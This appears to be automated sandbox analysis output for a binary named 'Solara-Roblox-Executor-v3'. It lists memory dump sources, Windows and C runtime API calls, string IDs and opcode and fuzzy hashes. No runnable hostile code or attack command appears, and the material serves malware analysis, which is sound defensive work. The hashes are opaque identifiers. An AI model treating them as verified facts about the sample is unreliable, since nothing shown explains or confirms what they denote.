                                                                                          • Instruction ID: 608eed39b5bb6985826acd1f336b1fca7a42038815dfd8fbd5504c375d9dce1f
                                                                                          • Opcode Fuzzy Hash: 2c7afb3b8b99802309b718f8794d9e917c829c407dd448784a4c79c5fd9d0faa
                                                                                          • Instruction Fuzzy Hash:
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapProcess
                                                                                          • String ID:
                                                                                          • API String ID: 54951025-0
                                                                                          • Opcode ID: 98aa76694d1fc415001f5e1e6474a41e6ca3555b069cf609e7f408f934897c9e
                                                                                          • Instruction ID: b8271a3aec6411ff659e3dd371e9b2e5e9e4fcac9a63abe54a9de5af68863186
                                                                                          • Opcode Fuzzy Hash: 98aa76694d1fc415001f5e1e6474a41e6ca3555b069cf609e7f408f934897c9e
                                                                                          • Instruction Fuzzy Hash: 81A02430100111CF53014F315F04F4C37DCD5057D0F04C05CD410C1070D73040405F00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aff3a28be8aa614b549e54a24693082d5edc653d46a31111da9f4dea998926b8
                                                                                          • Instruction ID: 314fd1c7d32e4a876e559bf8cfbf360e744af3324917b5a31b5097b4a9f7e7b7
                                                                                          • Opcode Fuzzy Hash: aff3a28be8aa614b549e54a24693082d5edc653d46a31111da9f4dea998926b8
                                                                                          • Instruction Fuzzy Hash: C7D0923A641A58AFC211DF4AE440D41F7BCFB9E770B154166EA4893B20C331FC12CAE0
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(027805F8,027805F8,00000000,7FFFFFFF,?,003141BD,027805F8,027805F8,00000000,027805F8,?,?,?,?,027805F8,00000000), ref: 00314278
                                                                                          • __alloca_probe_16.LIBCMT ref: 00314333
                                                                                          • __alloca_probe_16.LIBCMT ref: 003143C2
                                                                                          • __freea.LIBCMT ref: 0031440D
                                                                                          • __freea.LIBCMT ref: 00314413
                                                                                          • __freea.LIBCMT ref: 00314449
                                                                                          • __freea.LIBCMT ref: 0031444F
                                                                                          • __freea.LIBCMT ref: 0031445F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                          • String ID:
                                                                                          • API String ID: 127012223-0
                                                                                          • Opcode ID: 94b257b404c86832abb627468ecaf1d59e8216818ed1db8e46c2c26b96a37bd5
                                                                                          • Instruction ID: deafa06ac2bc7d9666ee728d5b712a439a775c4b80e44c9deb9a0355c0cfb9f0
                                                                                          • Opcode Fuzzy Hash: 94b257b404c86832abb627468ecaf1d59e8216818ed1db8e46c2c26b96a37bd5
                                                                                          • Instruction Fuzzy Hash: 0871E3329002499BDF2A9E95CC41BFF7BA9AF4D750F2A0469F914BB281DA359CC18B50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 3213747228-0
                                                                                          • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction ID: 0681bc504546505fd2062856053beaf49c29e4e7ca0129c5f9872ae847f0e050
                                                                                          • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction Fuzzy Hash: B8B168329023559FDB178F28CCA1BEEBBA5EF55710F258165E984AF2C2DB74D801C7A0
                                                                                          APIs
                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00304E6B
                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 003050E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                          • String ID: csm$csm$csm$xf1
                                                                                          • API String ID: 2673424686-3925582995
                                                                                          • Opcode ID: d887cadcedc2e3b39ec5782712b2c19715057a8d36884e887ad43fcc82a8e552
                                                                                          • Instruction ID: 2abc048214e0d54a82fd9756429a194f7da16b711221aba0b6d07c22957d0397
                                                                                          • Opcode Fuzzy Hash: d887cadcedc2e3b39ec5782712b2c19715057a8d36884e887ad43fcc82a8e552
                                                                                          • Instruction Fuzzy Hash: 08B18EB1802209EFCF16DFA4C8619AFB7B5FF04300F15456AEA146B292D771DA61CF91
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 002FABE7
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 002FABEF
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 002FAC78
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 002FACA3
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 002FACF8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 1170836740-1018135373
                                                                                          • Opcode ID: 7c899a1a01531eea94985670a35347b987e9bcf83493a61184a7444ba776160e
                                                                                          • Instruction ID: 56d6be585b488bd76e0bdfca6849cfb0b9a6b9b2ded52928ee3ea945301bf2c8
                                                                                          • Opcode Fuzzy Hash: 7c899a1a01531eea94985670a35347b987e9bcf83493a61184a7444ba776160e
                                                                                          • Instruction Fuzzy Hash: 5F41F870A1121D9BCF11DF68C845AAEBBB5BF04364F148166E9189F392C731DD11CF92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d9bdac0f150399a84f965b2506ed2d360b146b621ea2316c219770fa520c5d6d
                                                                                          • Instruction ID: 59b80e2238a563632371cb9d183575159ee21c0602e13858a87bee7d0f0f285f
                                                                                          • Opcode Fuzzy Hash: d9bdac0f150399a84f965b2506ed2d360b146b621ea2316c219770fa520c5d6d
                                                                                          • Instruction Fuzzy Hash: E1B1D474A04249AFDB1BEF98CC51BEEBBB5BF4D310F144158E8059B292C7719E82CB60
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00304464,002FA97D,002F9BD4), ref: 0030447B
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00304489
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003044A2
                                                                                          • SetLastError.KERNEL32(00000000,00304464,002FA97D,002F9BD4), ref: 003044F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: aa434cc284674cb587b289cd3791fc6455f059de44681006a5815a57a3a7cbb0
                                                                                          • Instruction ID: 274bb2ece3b39300186914fdc91070631315c06ae7ec1d727503826cccd72438
                                                                                          • Opcode Fuzzy Hash: aa434cc284674cb587b289cd3791fc6455f059de44681006a5815a57a3a7cbb0
                                                                                          • Instruction Fuzzy Hash: 1301D47220B7166EF73B2B76BCA5A6B2788EB41774F21023DFA11594F2EF124D469240
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9B9A4FEF,?,?,00000000,00315684,000000FF,?,002FF2B9,002FF1A0,?,002FF355,00000000), ref: 002FF22D
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002FF23F
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00315684,000000FF,?,002FF2B9,002FF1A0,?,002FF355,00000000), ref: 002FF261
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 1ece1702947f741583cb7f3a6271a95d1ff994ac165f927ae4e4d23b2a84e56c
                                                                                          • Instruction ID: 5464d5ac3bc1c5591a60e20b11fddc22f85a8dfb55e9fafc6f0196a3fd278a0f
                                                                                          • Opcode Fuzzy Hash: 1ece1702947f741583cb7f3a6271a95d1ff994ac165f927ae4e4d23b2a84e56c
                                                                                          • Instruction Fuzzy Hash: AF018F35950669AFDB168F54DC09BEEBBB8FB48B51F044639ED11A22D0DB759900CA80
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 002F77F9
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002F7804
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002F7872
                                                                                            • Part of subcall function 002F76EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 002F7707
                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 002F781F
                                                                                          • _Yarn.LIBCPMT ref: 002F7835
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                          • String ID:
                                                                                          • API String ID: 1088826258-0
                                                                                          • Opcode ID: c52166765d52a03d462c09ce8c6601537f1f299ab86d8b483541023d6baa8f9b
                                                                                          • Instruction ID: 5adf40ed71c8e9dfb4ffe39cf687f58f2dda118b0243193acc01fb2b7f2f8de8
                                                                                          • Opcode Fuzzy Hash: c52166765d52a03d462c09ce8c6601537f1f299ab86d8b483541023d6baa8f9b
                                                                                          • Instruction Fuzzy Hash: 4F01B175A141199BC70AEF20D9455BDBB66BFD93C0F14006DEA0257391CF349E62CF81
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0030F74C,00000000,?,00321E20,?,?,?,0030F683,00000004,InitializeCriticalSectionEx,003190D4,003190DC), ref: 0030F6BD
                                                                                          • GetLastError.KERNEL32(?,0030F74C,00000000,?,00321E20,?,?,?,0030F683,00000004,InitializeCriticalSectionEx,003190D4,003190DC,00000000,?,0030539C), ref: 0030F6C7
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0030F6EF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 3177248105-2084034818
                                                                                          • Opcode ID: a8cf60a207f48df36a2297b03077ed9fe12a0f091135c3aa13dc68e7c475b790
                                                                                          • Instruction ID: 673b45aa6e689c056de9bf8afa637749a640298dd0a43d3a058c8046cf782d98
                                                                                          • Opcode Fuzzy Hash: a8cf60a207f48df36a2297b03077ed9fe12a0f091135c3aa13dc68e7c475b790
                                                                                          • Instruction Fuzzy Hash: F6E04830281209BBEB331B61DC0AF983B589B04B50F254030FE0CA84F1DBA399949584
                                                                                          APIs
                                                                                          • GetConsoleOutputCP.KERNEL32(9B9A4FEF,00000000,00000000,?), ref: 0030D7B1
                                                                                            • Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0030DA03
                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0030DA49
                                                                                          • GetLastError.KERNEL32 ref: 0030DAEC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                          • String ID:
                                                                                          • API String ID: 2112829910-0
                                                                                          • Opcode ID: aa9f92c606b7881ff9c97d88df2c8f2216ea6e581127d4d692cb789f3e545ef3
                                                                                          • Instruction ID: 3b5e2853c1d91fae6da5bf354677a1794b0741c4fb939ec9e5663346d7bf8ad9
                                                                                          • Opcode Fuzzy Hash: aa9f92c606b7881ff9c97d88df2c8f2216ea6e581127d4d692cb789f3e545ef3
                                                                                          • Instruction Fuzzy Hash: 78D14A75E052489FCB16CFE8C8909EEBBF9FF08314F24416AE455EB291D730A941CB50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPointer
                                                                                          • String ID:
                                                                                          • API String ID: 1740715915-0
                                                                                          • Opcode ID: f076e848f906efc686ae46eadc9a85d995cdca8f242495f7a7bb77f274220101
                                                                                          • Instruction ID: e832066d6a829be8d56f79a9e342e5fde14eb1a814dce6a6fe3970edab2bb69c
                                                                                          • Opcode Fuzzy Hash: f076e848f906efc686ae46eadc9a85d995cdca8f242495f7a7bb77f274220101
                                                                                          • Instruction Fuzzy Hash: 645105F2606206AFDB2A8F50D8A1BBAB7A8EF04310F15452DEB45476D1D731EE50CB50
                                                                                          APIs
                                                                                            • Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862
                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0030B5DA
                                                                                          • __dosmaperr.LIBCMT ref: 0030B5E1
                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0030B61B
                                                                                          • __dosmaperr.LIBCMT ref: 0030B622
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1913693674-0
                                                                                          • Opcode ID: 4f495e21f535bafe5933d5322089073cbe43df9b174f513a34f466cd9147fe0b
                                                                                          • Instruction ID: eb89c2a04d00236cf062da9c45ff5c47d17ca447c30883d58747664a0b4fba56
                                                                                          • Opcode Fuzzy Hash: 4f495e21f535bafe5933d5322089073cbe43df9b174f513a34f466cd9147fe0b
                                                                                          • Instruction Fuzzy Hash: 5F21C271602209AFDB22AF65CCA0CABF7ACFF053647118468F919D75D0E732EC408BA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c94a707f6b129384865c5f135a76044c7033cfb0f2b638fbe2cff50eb85eae9
                                                                                          • Instruction ID: 4a8204428d7f047a18e01d8e4f906484216aa2a122bcf44f360b225e75a7b053
                                                                                          • Opcode Fuzzy Hash: 4c94a707f6b129384865c5f135a76044c7033cfb0f2b638fbe2cff50eb85eae9
                                                                                          • Instruction Fuzzy Hash: DE21807122020EAFDB11EF74CD519BAF7A8EF403A47208524FA16C7550DB71FC608B60
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0030C976
                                                                                            • Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030C9AE
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030C9CE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
